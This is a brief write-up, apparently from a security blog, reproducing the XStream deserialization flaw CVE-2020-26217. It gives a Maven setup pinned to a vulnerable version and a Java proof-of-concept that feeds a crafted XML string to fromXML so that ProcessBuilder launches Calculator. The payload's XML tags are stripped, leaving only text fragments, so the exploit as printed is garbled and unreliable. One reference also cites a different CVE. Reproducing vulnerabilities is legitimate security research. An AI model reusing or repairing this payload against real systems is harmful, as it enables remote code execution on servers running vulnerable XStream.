[CVE-2020-26217] Reproducing the XStream Remote Code Execution Vulnerability


0x01 Environment Setup

Install XStream via Maven:

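    <dependencies>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.11.1</version>
        </dependency>
    </dependencies>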

0x02 Vulnerability Reproduction

PoC:

import com.thoughtworks.xstream.XStream;


public class xstreamdemo {
    public static void main (String[] args){
        XStream xstream = new XStream();
        String xml = "\n" +
                "  \n" +
                "    \n" +
                "      0\n" +
                "      \n" +
                "        \n" +
                "          \n" +
                "            text/plain\n" +
                "            \n" +
                "              \n" +
                "                \n" +
                "                  \n" +
                "                    0\n" +
                "                    -1\n" +
                "                    1\n" +
                "                    \n" +
                "                      \n" +
                "                        \n" +
                "                          open\n" +
                "                          -a\n" +
                "                          Calculator\n" +
                "                        \n" +
                "                      \n" +
                "                    \n" +
                "                  \n" +
                "                  \n" +
                "                    \n" +
                "                      java.lang.ProcessBuilder\n" +
                "                      start\n" +
                "                      \n" +
                "                    \n" +
                "                    start\n" +
                "                  \n" +
                "                  \n" +
                "                \n" +
                "                KEYS\n" +
                "              \n" +
                "              \n" +
                "                \n" +
                "                0\n" +
                "                0\n" +
                "                0\n" +
                "              \n" +
                "            \n" +
                "            false\n" +
                "          \n" +
                "          \n" +
                "        \n" +
                "        0\n" +
                "      \n" +
                "    \n" +
                "    test\n" +
                "  \n" +
                "";
        xstream.fromXML(xml);
    }
}

0x03 References

https://x-stream.github.io/CVE-2017-7957.html
https://xz.aliyun.com/t/8526
